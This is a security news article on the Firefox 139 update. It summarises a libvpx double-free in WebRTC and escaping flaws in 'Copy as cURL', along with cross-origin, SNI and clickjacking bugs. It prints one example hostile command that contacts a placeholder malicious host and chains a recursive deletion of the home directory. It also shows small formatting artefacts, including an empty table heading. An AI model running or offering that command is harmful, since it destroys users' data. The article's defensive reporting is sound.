Zero-Interaction libvpx Flaw in Firefox Allows Attackers to Run Arbitrary Code

Mozilla has released Firefox 139, addressing several critical and moderate security vulnerabilities that posed significant risks to users.

The update, announced on May 27, 2025, resolves issues ranging from memory corruption and local code execution to cross-origin data leaks, reinforcing Firefox’s commitment to user safety.

Double-Free in libvpx Encoder:

One of the most severe vulnerabilities fixed in Firefox 139 is a double-free bug in the libvpx encoder, specifically within the vpx_codec_enc_init_multi function used by WebRTC.

Reported by Randell Jesup, this flaw could trigger a double-free scenario after a failed memory allocation during encoder initialization.

The result: potential memory corruption and a crash that can be exploited for arbitrary code execution—an impact rated as critical by Mozilla.

Technical Details:

• Vulnerability Type: Double-free
• Component: libvpx encoder (WebRTC)
• Function: vpx_codec_enc_init_multi
• Potential Impact: Memory corruption, remote code execution

A double-free occurs when a program attempts to free the same memory location twice, leading to undefined behavior and often exploitable crashes.

Attackers exploiting this bug could potentially execute malicious code on a user’s system without any user interaction beyond normal browsing.

Local Code Execution via “Copy as cURL”

Firefox 139 also patches multiple moderate severity vulnerabilities, including two distinct flaws in the “Copy as cURL” developer tool feature.

Both were reported by Ameen Basha M K:

• CVE-2025-5264: Insufficient escaping of newline characters allowed attackers to craft malicious commands. If a user copies and executes such a command, it could lead to local code execution.
• CVE-2025-5265: On Windows, insufficient escaping of the ampersand character in the same feature created a similar risk, but this bug was platform-specific to Firefox for Windows.

Example of Risky Command:

bashcurl "http://malicious.com" && rm -rf ~/

If newline or ampersand characters are not properly escaped, an attacker could append destructive shell commands, tricking users into executing them.

Additional moderate vulnerabilities include:

• CVE-2025-5263: Improper isolation of script execution error handling, enabling cross-origin leak attacks.
• CVE-2025-5266: Script element events leaking cross-origin resource status, facilitating XS-Leaks attacks.
• CVE-2025-5268, CVE-2025-5272: Memory safety bugs that could enable arbitrary code execution if exploited.

Low Impact Issues and Security Enhancements

While most vulnerabilities addressed in Firefox 139 are critical or moderate, several low-impact flaws were also fixed:

• CVE-2025-5270: In some cases, Server Name Indication (SNI) could be sent unencrypted even with encrypted DNS enabled, potentially exposing browsing metadata.
• CVE-2025-5271: The DevTools preview feature ignored Content Security Policy (CSP) headers, opening the door to content injection attacks.
• CVE-2025-5267: A clickjacking vulnerability could have led to leaking saved payment card details to malicious sites.

Risk Factors Table

Firefox 139’s security update demonstrates Mozilla’s proactive approach to mitigating both critical and moderate threats.

Users are strongly encouraged to update to the latest version to benefit from these essential security fixes and maintain a secure browsing environment.

Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!